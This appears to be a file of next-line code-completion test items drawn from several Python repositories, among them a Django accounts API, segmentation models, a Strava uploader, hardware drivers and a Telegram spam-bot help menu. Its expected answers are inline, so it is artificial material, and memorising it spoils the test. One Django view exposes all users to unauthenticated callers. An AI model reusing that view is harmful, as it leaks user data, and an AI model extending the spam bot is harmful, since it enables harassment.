date_joined = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)
objects = UserManager()
USERNAME_FIELD = "username"
REQUIRED_FIELDS = ["email", "phone", "first_name", "last_name"]
def save(self, *args, **kwargs):
super(User, self).save(*args, **kwargs)
return self
def __str__(self):
return self.username
class Meta:
ordering = ("-date_joined",)
verbose_name = "User"
verbose_name_plural = "Users"
# Path: backend/accounts/models.py
class EmailConfirmationToken(models.Model):
user = models.OneToOneField(User, unique=True, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, blank=True, null=True)
def __str__(self):
return self.user
class Meta:
verbose_name = "Email Confirmation Token"
verbose_name_plural = "Email Confirmation Tokens"
# Path: backend/accounts/utils.py
def send_confirmation_email(email, token_id, user_id):
data = {
"token_id": str(token_id),
"user_id": str(user_id)
}
message = get_template("accounts/confirmation_email.txt").render(data)
send_mail(
subject="Email Confirmation",
message=message,
from_email="[email protected]",
recipient_list=[email],
fail_silently=True
)
print("Email confirmation sent!")
# Path: backend/accounts/views.py
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework import status
from .serializers import UserSerializer
from .models import User, EmailConfirmationToken
from .utils import send_confirmation_email
class UserAPIView(APIView):
permission_classes = [AllowAny,]
def post(self, request):
user = request.data
serializer = UserSerializer(data=user)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def get_queryset(self):
return User.objects.all()
def get(self, request, *args, **kwargs):
users = self.get_queryset()
serializer = UserSerializer(users, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, *args, **kwargs):
serializer_data = request.data.get("user", {})
serializer = UserSerializer(request.user, data=serializer_data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
class UserInformationAPIView(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
user = request.user
email = user.email
is_verified = user.is_verified
payload = {"email": email, "is_verified": is_verified}
return Response(data=payload, status=status.HTTP_200_OK)
class SendEmailConfirmationTokenAPIView(APIView):
permission_classes = [IsAuthenticated]
def post(self, request, format=None):
user = request.user
token = EmailConfirmationToken.objects.create(user=user)
| send_confirmation_email(email=user.email, token_id=token.pk, user_id=user.pk) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: vitant-lang/CBAM-ASPP
# Path: nets/xception.py
def xception(pretrained=True, downsample_factor=16):
model = Xception(downsample_factor=downsample_factor)
if pretrained:
model.load_state_dict(load_url('https://github.com/bubbliiiing/deeplabv3-plus-pytorch/releases/download/v1.0/xception_pytorch_imagenet.pth'), strict=False)
return model
# Path: nets/mobilenetv2.py
def mobilenetv2(pretrained=False, **kwargs):
model = MobileNetV2(n_class=1000, **kwargs)
if pretrained:
model.load_state_dict(load_url('https://github.com/bubbliiiing/deeplabv3-plus-pytorch/releases/download/v1.0/mobilenet_v2.pth.tar'), strict=False)
return model
# Path: nets/attention.py
class se_block(nn.Module):
def __init__(self, channel, ratio=16):
super(se_block, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Sequential(
nn.Conv2d(channel, channel // ratio, kernel_size=1, bias=False),
nn.ReLU(inplace=True),
nn.Conv2d(channel // ratio, channel, kernel_size=1, bias=False),
nn.Sigmoid()
)
def forward(self, x):
y = self.avg_pool(x)
y = self.fc(y)
return x * y
# Path: nets/attention.py
class CBAM(nn.Module):
def __init__(self, in_channels, ratio=16, kernel_size=7):
super(CBAM, self).__init__()
self.channel_attention = ChannelAttention(in_channels, ratio)
self.spatial_attention = SpatialAttention(in_channels, kernel_size)  # pass the in_channels argument
def forward(self, x):
x = self.channel_attention(x)
x = self.spatial_attention(x)
return x
# Path: nets/attention.py
class eca_block(nn.Module):
def __init__(self, channel, b=1, gamma=2):
super(eca_block, self).__init__()
kernel_size = int(abs((math.log(channel, 2) + b) / gamma))
kernel_size = kernel_size if kernel_size % 2 else kernel_size + 1
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.conv = nn.Conv1d(1, 1, kernel_size=kernel_size, padding=(kernel_size - 1) // 2, bias=False)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
y = self.avg_pool(x)
y = self.conv(y.squeeze(-1).transpose(-1, -2)).transpose(-1, -2).unsqueeze(-1)
y = self.sigmoid(y)
return x * y.expand_as(x)
# Path: nets/deeplabv3_plus.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from .xception import xception
from .mobilenetv2 import mobilenetv2
from .attention import se_block,CBAM,eca_block
from functools import partial
atteionb = [se_block, CBAM, eca_block]
class MobileNetV2(nn.Module):
def __init__(self, downsample_factor=8, pretrained=True):
super(MobileNetV2, self).__init__()
| model = mobilenetv2(pretrained) |
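As an aside on the attention blocks imported above, each wraps a feature map without changing its shape; a small smoke test using eca_block, whose implementation is fully visible above:

import torch

x = torch.randn(2, 64, 32, 32)    # a batch of feature maps
block = eca_block(channel=64)
assert block(x).shape == x.shape  # attention only re-weights activations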
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: JiNanPiWang/apple_health_export_gpx_add_heartrate
# Path: utils/exceptions.py
class RateLimitException(Exception):
def __init__(self, message="API rate limit exceeded"):
self.message = message
super().__init__(self.message)
# Path: utils/exceptions.py
class NoInternetException(Exception):
def __init__(self, message="No Internet connection"):
self.message = message
super().__init__(self.message)
# Path: src/strava_gpx_uploader.py
import json
import os
import time
from stravalib.util.limiter import RateLimiter, XRateLimitRule
from stravalib.client import Client, exc
from utils.exceptions import RateLimitException, NoInternetException
def get_strava_client(access_token):
token = access_token
rate_limiter = RateLimiter()
rate_limiter.rules.append(XRateLimitRule(
{'short': {'usageFieldIndex': 0, 'usage': 0,
# 60s * 15 = 15 min
'limit': 100, 'time': (60 * 15),
'lastExceeded': None, },
'long': {'usageFieldIndex': 1, 'usage': 0,
# 60s * 60m * 24 = 1 day
'limit': 1000, 'time': (60 * 60 * 24),
'lastExceeded': None}}))
client = Client(rate_limiter=rate_limiter)
client.access_token = token
return client
class StravaGpxUploader:
def __init__(self, file_path: str, activity_type):
with open("config/strava_config.json", 'r') as f:
strava_config = json.load(f)
# Edit access_token in the strava_config.json or edit here
# like access_token = '***'
self.file_path = file_path
self.access_token = strava_config["access_token"]
self.activity_type = activity_type
self.client = get_strava_client(self.access_token)
def get_athlete_name(self):
athlete = None
for i in range(2):
try:
athlete = self.client.get_athlete()
except exc.RateLimitExceeded as err:
if i > 0:
raise RateLimitException("Daily Rate limit exceeded")
print("Rate limit exceeded in connecting - Retrying strava connection in 15 minutes")
time.sleep(900)
continue
break
print("Now authenticated for " + athlete.firstname + " " + athlete.lastname)
# client, gpxfile, strava_activity_type, notes
def upload_gpx(self):
gpxfile = self.file_path
if not os.path.isfile(gpxfile):
print("No file found for " + gpxfile + "!")
return False
print("Uploading " + gpxfile)
for i in range(2):
try:
# if the upload succeeds, control falls through to the break below
upload = self.client.upload_activity(
activity_file=open(gpxfile, 'r'),
data_type='gpx',
description='',
activity_type=self.activity_type
)
except exc.RateLimitExceeded as err:
# only the second loop iteration reaches this branch
# it means the daily limit has been exceeded, so abort
if i > 0:
raise RateLimitException("Daily Rate limit exceeded, please try tomorrow")
# the first iteration lands here
# it means this request hit the rate limit, so wait 15 minutes
print("Rate limit exceeded in uploading - auto pausing uploads for 15 minutes to avoid rate-limit")
time.sleep(900)
continue
except ConnectionError as err:
| raise NoInternetException("No Internet connection: {}".format(err)) |
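The two-pass retry idiom used in both methods above, extracted for clarity (do_strava_call is a hypothetical stand-in for the wrapped API call):

for attempt in range(2):
    try:
        result = do_strava_call()  # hypothetical API call
    except exc.RateLimitExceeded:
        if attempt > 0:  # second failure in a row: give up for the day
            raise RateLimitException("Daily Rate limit exceeded")
        time.sleep(900)  # back off for 15 minutes, then retry once
        continue
    break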
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: rgrizzell/CircuitPython_LILYGO_T-Deck
# Path: lilygo_tdeck.py
class Keyboard:
"""Controls the keyboard peripheral. This class can be extended to support additional
functionality if the keyboard is utilizing custom firmware.
:param i2c: Object representing the I2C interface used to communicate with the keyboard.
:type i2c: I2C
:param int device_address: The I2C address of the keyboard device. Default is 0x55 (85).
"""
def __init__(self, i2c: I2C, device_address: int = None) -> None:
self._i2c = i2c
self._i2c_addr = device_address or _KEYBOARD_I2C_ADDR
def get_keypress(self) -> str | None:
"""Get the last keypress.
:return: character representing the key that was pressed
"""
buf = bytearray(1)
self._i2c.try_lock()
self._i2c.readfrom_into(self._i2c_addr, buffer=buf)
self._i2c.unlock()
if buf != b"\x00":
return buf.decode()
return None
# Path: lilygo_tdeck.py
class TDeck:
"""Class representing the LILYGO T-Deck.
:param keyboard: Object representing the keyboard. If none is provided, one is created.
:type keyboard: Keyboard
:param trackball: Object representing the trackball. If none is provided, one is created.
:type trackball: Trackball
:param bool debug: Print extra debug statements during initialization.
"""
def __init__(
self,
keyboard: Keyboard = None,
trackball: Trackball = None,
debug: bool = False,
) -> None:
self.debug = debug
if sys.implementation.version[0] < 9:
raise NotImplementedError(
"LILYGO T-Deck only supports CircuitPython version 9.0.0 or greater"
)
self._i2c = board.I2C()
self._spi = board.SPI()
# Touchscreen
self._debug("Init touchscreen")
# TODO: Create driver: https://github.com/rgrizzell/CircuitPython_GT911
# int_pin = DigitalInOut(board.TOUCH_INT)
# self.touchscreen = GT911(self._i2c, _TOUCHSCREEN_I2C_ADDR, int_pin=int_pin)
# Keyboard
self._debug("Init keyboard")
self.keyboard = keyboard or Keyboard(self._i2c)
self.get_keypress = self.keyboard.get_keypress
# Trackball
self._debug("Init Trackball")
self.trackball = trackball or Trackball(
board.TRACKBALL_UP,
board.TRACKBALL_RIGHT,
board.TRACKBALL_DOWN,
board.TRACKBALL_LEFT,
board.TRACKBALL_CLICK,
)
self.get_trackball = self.trackball.get_trackball
self.get_click = self.trackball.get_click
# SD Card
self._debug("Init SD Card")
self.sdcard = None
try:
self.sdcard = SDCard(self._spi, board.SDCARD_CS)
vfs = storage.VfsFat(self.sdcard)
storage.mount(vfs, "/sd")
except OSError as error:
print("SD Card disabled:", error)
# Speaker
self._debug("Init Speaker")
self.speaker = None
try:
self.speaker = audiobusio.I2SOut(
board.SPEAKER_SCK, board.SPEAKER_WS, board.SPEAKER_DOUT
)
except RuntimeError:
pass
# Microphone
self._debug("Init Microphone")
self.microphone = None
if hasattr(audiobusio, "I2SIn"):
self.microphone = audiobusio.I2SIn(
board.MICROPHONE_SCK,
board.MICROPHONE_WS,
board.MICROPHONE_DIN,
board.MICROPHONE_MCK,
)
else:
print("Microphone disabled: audiobusio does not support I2S input")
# LoRa - Optional
# self._debug("Init LoRa")
def _debug(self, msg):
if self.debug:
print(msg)
# Path: examples/lilygo_tdeck_custom_keyboard.py
import time
import board
from lilygo_tdeck import Keyboard, TDeck
# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
# SPDX-FileCopyrightText: Copyright (c) 2023 Robert Grizzell
#
# SPDX-License-Identifier: Unlicense
class MyCustomKeyboard(Keyboard):
def __init__(self, backlight: bool = True):
super().__init__(board.I2C())
self.backlight(backlight)
def backlight(self, state: bool = None, register: int = 0x1):
"""Send an I2C command to control the keyboard backlight.
Custom keyboard firmware is required for this to work.
"""
if state is None:
buf = bytearray(1)
else:
buf = bytearray(2)
buf[1] = int(state)
buf[0] = register
self._i2c.try_lock()
self._i2c.writeto(self._i2c_addr, buffer=buf)
self._i2c.unlock()
k = MyCustomKeyboard()
| t = TDeck(keyboard=k) |
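A plausible continuation of this example (hypothetical, since the original file is truncated here) polls the keyboard and echoes keypresses:

while True:
    key = t.get_keypress()
    if key:
        print("pressed:", key)
    time.sleep(0.05)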
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: dataaug/open-interpreter-free
# Path: interpreter/utils/count_tokens.py
def count_messages_tokens(messages=[], model=None):
"""
Count the number of tokens in a list of messages
"""
tokens_used = 0
for message in messages:
if isinstance(message, str):
tokens_used += count_tokens(message, model=model)
elif "message" in message:
tokens_used += count_tokens(message["message"], model=model)
if "code" in message:
tokens_used += count_tokens(message["code"], model=model)
if "output" in message:
tokens_used += count_tokens(message["output"], model=model)
prompt_cost = token_cost(tokens_used, model=model)
return (tokens_used, prompt_cost)
# Path: interpreter/utils/count_tokens.py
def count_tokens(text="", model="gpt-4"):
"""
Count the number of tokens in a string
"""
encoder = tiktoken.encoding_for_model(model)
return len(encoder.encode(text))
# Path: tests/test_interpreter.py
import os
import re
import time
import interpreter
from random import randint
from interpreter.utils.count_tokens import count_messages_tokens, count_tokens
Round to 2 decimal places.
""".strip()
messages = interpreter.chat(order_of_operations_message)
assert str(round(test_result, 2)) in messages[-1]["message"]
def test_delayed_exec():
interpreter.chat(
"""Can you write a single block of code and execute it that prints something, then delays 1 second, then prints something else? No talk just code. Thanks!"""
)
def test_nested_loops_and_multiple_newlines():
interpreter.chat(
"""Can you write a nested for loop in python and shell and run them? Don't forget to properly format your shell script and use semicolons where necessary. Also put 1-3 newlines between each line in the code. Only generate and execute the code. No explanations. Thanks!"""
)
def test_write_to_file():
interpreter.chat("""Write the word 'Washington' to a .txt file called file.txt""")
assert os.path.exists("file.txt")
interpreter.messages = [] # Just reset message history, nothing else for this test
messages = interpreter.chat(
"""Read file.txt in the current directory and tell me what's in it."""
)
assert "Washington" in messages[-1]["message"]
def test_markdown():
interpreter.chat(
"""Hi, can you test out a bunch of markdown features? Try writing a fenced code block, a table, headers, everything. DO NOT write the markdown inside a markdown code block, just write it raw."""
)
def test_generator():
start_of_message_emitted = False
end_of_message_emitted = False
start_of_code_emitted = False
end_of_code_emitted = False
executing_emitted = False
end_of_execution_emitted = False
for chunk in interpreter.chat("What's 38023*40334?", stream=True, display=False):
print(chunk)
if "start_of_message" in chunk:
start_of_message_emitted = True
if "end_of_message" in chunk:
end_of_message_emitted = True
if "start_of_code" in chunk:
start_of_code_emitted = True
if "end_of_code" in chunk:
end_of_code_emitted = True
if "executing" in chunk:
executing_emitted = True
if "end_of_execution" in chunk:
end_of_execution_emitted = True
assert start_of_message_emitted
assert end_of_message_emitted
assert start_of_code_emitted
assert end_of_code_emitted
assert executing_emitted
assert end_of_execution_emitted
def test_config_loading():
# because our test is running from the root directory, we need to do some
# path manipulation to get the actual path to the config file or our config
# loader will try to load from the wrong directory and fail
currentPath = os.path.dirname(os.path.abspath(__file__))
config_path = os.path.join(currentPath, "./config.test.yaml")
interpreter.extend_config(config_path=config_path)
# check the settings we configured in our config.test.yaml file
temperature_ok = interpreter.temperature == 0.25
model_ok = interpreter.model == "gpt-3.5-turbo"
debug_mode_ok = interpreter.debug_mode == True
assert temperature_ok and model_ok and debug_mode_ok
def test_system_message_appending():
ping_system_message = (
"Respond to a `ping` with a `pong`. No code. No explanations. Just `pong`."
)
ping_request = "ping"
pong_response = "pong"
interpreter.system_message += ping_system_message
messages = interpreter.chat(ping_request)
assert messages == [
{"role": "user", "message": ping_request},
{"role": "assistant", "message": pong_response},
]
def test_reset():
# make sure that interpreter.reset() clears out the messages Array
assert interpreter.messages == []
def test_token_counter():
system_tokens = count_tokens(
text=interpreter.system_message, model=interpreter.model
)
prompt = "How many tokens is this?"
prompt_tokens = count_tokens(text=prompt, model=interpreter.model)
messages = [
{"role": "system", "message": interpreter.system_message}
] + interpreter.messages
| system_token_test = count_messages_tokens( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: TheJacksonLaboratory/geneweaver-client
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_EXISTING_COMBINATIONS = [
dict(e)
for e in chain.from_iterable(
combinations(MOCK_EXISTING_FIELDS, r)
for r in range(len(MOCK_EXISTING_FIELDS) + 1)
)
]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_MODEL_FIELD_COMBINATIONS = [
set(s)
for s in chain.from_iterable(
combinations(MOCK_MODEL_FIELDS, r) for r in range(len(MOCK_MODEL_FIELDS) + 1)
)
]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
MOCK_MODEL_FIELDS = [field_name for field_name in MockModel.__fields__.keys()]
# Path: tests/unit/utils/cli/prompt/pydantic/conftest.py
class MockModel(MockInternalModel):
"""Mock model for testing."""
sub_model: MockInternalModel
sub_model_optional: Optional[MockInternalModel]
# Path: tests/unit/utils/cli/prompt/pydantic/test_prompt_for_missing_fields.py
from unittest.mock import Mock
from geneweaver.client.utils.cli.prompt.pydantic import prompt_for_missing_fields
from tests.unit.utils.cli.prompt.pydantic.conftest import (
MOCK_EXISTING_COMBINATIONS,
MOCK_MODEL_FIELD_COMBINATIONS,
MOCK_MODEL_FIELDS,
MockModel,
)
import pytest
"""Test the prompt_for_missing_fields function."""
# We can't use every combination of fields because the number of combinations
# grows much too large to be practical.
# Instead, we use the first 25 and last 25 combinations.
@pytest.mark.parametrize(
"existing", MOCK_EXISTING_COMBINATIONS[:25] + MOCK_EXISTING_COMBINATIONS[-25:]
)
@pytest.mark.parametrize(
"exclude", MOCK_MODEL_FIELD_COMBINATIONS[:25] + MOCK_MODEL_FIELD_COMBINATIONS[-25:]
)
@pytest.mark.parametrize("prompt_to_keep_existing", [True, False])
def test_prompt_for_missing(existing, exclude, prompt_to_keep_existing, monkeypatch):
"""Test the prompt_for_missing_fields function."""
mock_prompt_to_keep = Mock()
mock_prompt_for_field_by_type = Mock()
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_to_keep_field",
mock_prompt_to_keep,
)
monkeypatch.setattr(
"geneweaver.client.utils.cli.prompt.pydantic.prompt_for_field_by_type",
mock_prompt_for_field_by_type,
)
prompt_for_missing_fields(MockModel, existing, exclude, prompt_to_keep_existing)
# We should prompt for every field in `existing` that is not in `exclude`.
if prompt_to_keep_existing and len(existing) > 0:
assert mock_prompt_to_keep.call_count == len(set(existing.keys()) - exclude)
# We should prompt for every field in `MockModel` that is not in
# `existing` or `exclude`.
assert mock_prompt_for_field_by_type.call_count == len(
| set(MOCK_MODEL_FIELDS) - set(existing.keys()) - exclude |
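As an aside, the MOCK_*_COMBINATIONS constants above are built with the standard itertools powerset recipe; here is that recipe in isolation (the field names are hypothetical).

from itertools import chain, combinations

fields = ["name", "score", "notes"]  # hypothetical field names
subsets = [set(s) for s in chain.from_iterable(
    combinations(fields, r) for r in range(len(fields) + 1)
)]
print(len(subsets))  # 2**3 == 8 subsets, from the empty set to all three fields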
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: hmmbug/pythaidate
# Path: pythaidate/constants.py
DAYS_IN_800_YEARS = 292207
# Path: pythaidate/constants.py
TIME_UNITS_IN_1_DAY = 800
# Path: pythaidate/constants.py
EPOCH_OFFSET = 373
# Path: pythaidate/constants.py
UCCAPON_CONSTANT = 2611
# Path: pythaidate/constants.py
APOGEE_ROTATION_DAYS = 3232
# Path: pythaidate/constants.py
CAL_TYPE_DAY_COUNTS = {
"A": 354,
"B": 355,
"C": 384,
"c": 384,
}
# Path: pythaidate/lsyear.py
from .constants import (
DAYS_IN_800_YEARS,
TIME_UNITS_IN_1_DAY,
EPOCH_OFFSET,
UCCAPON_CONSTANT,
APOGEE_ROTATION_DAYS,
CAL_TYPE_DAY_COUNTS,
)
class LSYear:
"""
A lightweight class representing a lunisolar year on new year's day.
"""
def __init__(self, year: int):
self.offset = False # adjusted later
self.year = year
# this year
self.horakhun = (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
self.kammacapon = TIME_UNITS_IN_1_DAY - (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) % TIME_UNITS_IN_1_DAY
# ucc_i = (2611 + self.ahargana) // APOGEE_ROTATION_DAYS
self.uccapon = (UCCAPON_CONSTANT + self.horakhun) % APOGEE_ROTATION_DAYS
avo_quot = (self.horakhun * 11 + 650) // 692
self.avoman = (self.horakhun * 11 + 650) % 692
if self.avoman == 0:
self.avoman = 692
self.masaken = (avo_quot + self.horakhun) // 30
self.tithi = (avo_quot + self.horakhun) % 30
if self.avoman == 692:
self.tithi -= 1
# rest_quot = self.horakhun // 7
self.weekday = self.horakhun % 7
# next year
horakhun1 = ((year + 1) * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
quot1 = (horakhun1 * 11 + 650) // 692
# avo1 = (ahargana1 * 11 + 650) % 692
# mas1 = (quot1 + ahargana1) // 30
tithi1 = (quot1 + horakhun1) % 30
# Faraut, pg 28
self.langsak = max(1, self.tithi)
self.nyd = self.langsak
if self.nyd < 6:
self.nyd += 29
self.nyd = (self.weekday - self.nyd + 1 + 35) % 7
# is there a solar year leap day?
self.leapday = self.kammacapon <= 207
# A: normal year, 354 days; B: leap day, 355 days; C: leap month, 384 days
self.cal_type = 'A' # normal year
if self.tithi > 24 or self.tithi < 6:
self.cal_type = 'C' # leap month
if self.tithi == 25 and tithi1 == 5:
self.cal_type = 'A'
if (self.leapday and self.avoman <= 126) or (not self.leapday and self.avoman <= 137):
self.cal_type = 'B' if self.cal_type != 'C' else 'c'
# start of next year
if self.cal_type == 'A':
self.next_nyd = (self.nyd + 4) % 7
elif self.cal_type == 'B':
self.next_nyd = (self.nyd + 5) % 7
elif self.cal_type == 'C' or self.cal_type == 'c':
self.next_nyd = (self.nyd + 6) % 7
| self.caldays = CAL_TYPE_DAY_COUNTS[self.cal_type] |
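A worked instance of the horakhun/kammacapon arithmetic defined above; the year value is an arbitrary choice made for illustration, not taken from the repository's tests.

DAYS_IN_800_YEARS = 292207
TIME_UNITS_IN_1_DAY = 800
EPOCH_OFFSET = 373

year = 1349
horakhun = (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) // TIME_UNITS_IN_1_DAY + 1
kammacapon = TIME_UNITS_IN_1_DAY - (year * DAYS_IN_800_YEARS + EPOCH_OFFSET) % TIME_UNITS_IN_1_DAY
print(horakhun, kammacapon)  # 492735 384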
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: finalparanoia/Bert-VITS2-Preprocess
# Path: utils/create.py
def create(dataset_name: str):
raw_files = ls(f"{raw_dir}/*.wav")
current_dataset_path = f"{dataset_dir}/{dataset_name}"
i = 0
if exist(current_dataset_path):
mv(current_dataset_path, current_dataset_path+".old")
mk_dataset_dir(current_dataset_path)
tasks = []
for raw_file in raw_files:
tasks.append(delayed(cut_long_silences)(dataset_name, raw_file, i))
i += 1
multi_work = Parallel(n_jobs=16, backend='multiprocessing')
multi_work(tasks)
for tmp in ls(f"{tmp_dir}/*.wav"):
mv(tmp, f"{current_dataset_path}/audios/Raw")
# Path: utils/tag.py
def tag(dataset_name: str):
current_dataset_dir = f"{dataset_dir}/{dataset_name}"
audio_dir = f"{current_dataset_dir}/audios/wavs"
filelist = ls(f"{audio_dir}/*.wav")
file_list_path = f"{current_dataset_dir}/filelists/{dataset_name}.list"
complete_list = read_breakpoint(file_list_path)
inference_pipeline = pipeline(
task=Tasks.auto_speech_recognition,
model=modelscope_model
)
for file in filelist:
if file[-3:] != 'wav':
continue
# todo: support multiple speakers in a single dataset
if file in complete_list:
continue
rec_result = inference_pipeline(file)
if 'text' not in rec_result:
continue
line = file + "|" + dataset_name + "|ZH|" + rec_result['text'] + "\n"
with open(file_list_path, 'a', encoding='utf-8') as f:
f.write(line)
# Path: utils/resample.py
def resample(dataset_name: str):
current_dataset_dir = f"{dataset_dir}/{dataset_name}"
processes = cpu_count() - 2 if cpu_count() > 4 else 1
pool = Pool(processes=processes)
tasks = []
in_dir = f"{current_dataset_dir}/audios/raw"
out_dir = f"{current_dataset_dir}/audios/wavs"
for dir_path, _, filenames in os.walk(in_dir):
# subdirectory relative to the input root
spk_dir = os.path.relpath(dir_path, in_dir)
spk_dir_out = os.path.join(out_dir, spk_dir)
if not os.path.isdir(spk_dir_out):
os.makedirs(spk_dir_out, exist_ok=True)
for filename in filenames:
if filename.endswith(".wav"):
tasks.append((spk_dir, filename, in_dir, out_dir))
for _ in tqdm(
pool.imap_unordered(process, tasks),
):
pass
pool.close()
pool.join()
print("音频重采样完毕!")
# Path: utils/clean.py
def clean(dataset_name: str):
for raw_wav in ls(f"{dataset_dir}/{dataset_name}/audios/raw/*.wav"):
rm(raw_wav)
# Path: utils/model_conf.py
def gen_config(dataset_name: str):
with open("./config/config.json", "r") as f:
conf = loads(f.read())
conf["data"]["spk2id"][dataset_name] = 0
with open(f"{dataset_dir}/{dataset_name}/config.json", "w") as f:
f.write(dumps(conf))
# Path: main.py
from utils.create import create
from utils.tag import tag
from utils.resample import resample
from utils.clean import clean
from utils.model_conf import gen_config
if __name__ == "__main__":
pass
dataset_name = input("Please name the dataset: ")
create(dataset_name)
resample(dataset_name)
tag(dataset_name)
clean(dataset_name)
| gen_config(dataset_name) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: itzshukla/STRANGER-SPAM
# Path: config.py
SUDO_USERS = list(map(lambda x: int(x), getenv("SUDO_USERS", "6163010926").split(" ")))
# Path: config.py
ALIVE_PIC = getenv("ALIVE_PIC", "https://telegra.ph/file/aa4bf1e57d11fb75b602e.jpg")
# Path: config.py
OWNER_ID = int(getenv("OWNER_ID", "5518687442"))
# Path: config.py
HEROKU_APP_NAME = getenv("HEROKU_APP_NAME")
# Path: config.py
HEROKU_API_KEY = getenv("HEROKU_API_KEY")
# Path: TheXSpam/extra.py
import heroku3
from os import getenv
from config import SUDO_USERS, ALIVE_PIC, OWNER_ID, HEROKU_APP_NAME, HEROKU_API_KEY
from pyrogram import Client, filters
from pyrogram.types import Message
# © @shiva_ansh_op
FIRST_TEXT = f"""★ 𝗦𝘁𝗿𝗮𝗻𝗴𝗲𝗿-𝙎𝙥𝙖𝙢 𝙃𝙚𝙡𝙥 𝙈𝙚𝙣𝙪 ★
**» ʙᴏᴛ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/5)
**» ʀᴀɪᴅ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/6)
**» ꜱᴘᴀᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/7)
**» ᴅᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/8)"""
@Client.on_message(filters.user(SUDO_USERS) & filters.command(["help"], [".", "!", "/"]))
async def help(client: Client, message: Message):
await client.send_photo(
chat_id=message.chat.id,
photo=ALIVE_PIC,
caption=FIRST_TEXT
)
@Client.on_message(filters.user(OWNER_ID) & filters.command(["sudo"], ["/", ".", "!"]))
async def add_sudo(_, message: Message):
if not message.reply_to_message:
await message.reply_text("» ʀᴇᴘʟʏ ᴛᴏ ᴀ ᴜꜱᴇʀ !!")
return
| elif HEROKU_APP_NAME is None:
|
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: fg320/DEASC
# Path: deasc/utils_floris.py
def floris_input_handler(input_file, path):
"""Convert input file into a FLORIS interface object."""
# No input file
if input_file is None:
    err_msg = "Input file required"
    raise Exception(err_msg)
# Multiple input files
elif isinstance(input_file, list):
err_msg = "Required a single input file, multiple are provided"
raise Exception(err_msg)
# Initialize single floris object
else:
fi = FI(path+input_file)
print("Successfull single file import!")
return fi
# Path: deasc/utils_floris.py
def floris_properties(wf_model):
"""Extract wind farm model information from FLORIS object."""
fi = wf_model.interface
D = (fi.floris.farm.rotor_diameters).flatten()[0] # Flatten over wd and ws
H_hub = (fi.floris.farm.hub_heights).flatten()[0] # Flatten over wd and ws
n_turbs = len(wf_model.interface.get_turbine_layout()[0])
return D, H_hub, n_turbs
# Path: deasc/utils_floris.py
def floris_current_yaw(wf_model):
"""Extract and returns the current wind farm yaw angles."""
return wf_model.interface.floris.farm.yaw_angles[0][0]
# Path: deasc/utils_floris.py
def floris_reinitialise_layout(wf_model, layout_x, layout_y):
"""
Modify the wind farm layout based on the coordinates provided and
reinitialise the flow field. If the number of turbines is unchanged,
yaw angles are stored in the farm object. Limited to a FLORIS interface
object.
"""
# Extract FLORIS interface object
fi = wf_model.interface
# As floris reinitializes, it sets all yaw angles to 0 deg.
yaw_temp = fi.floris.farm.yaw_angles[0][0]
fi.reinitialize(layout_x=layout_x, layout_y=layout_y)
# Update number of turbines
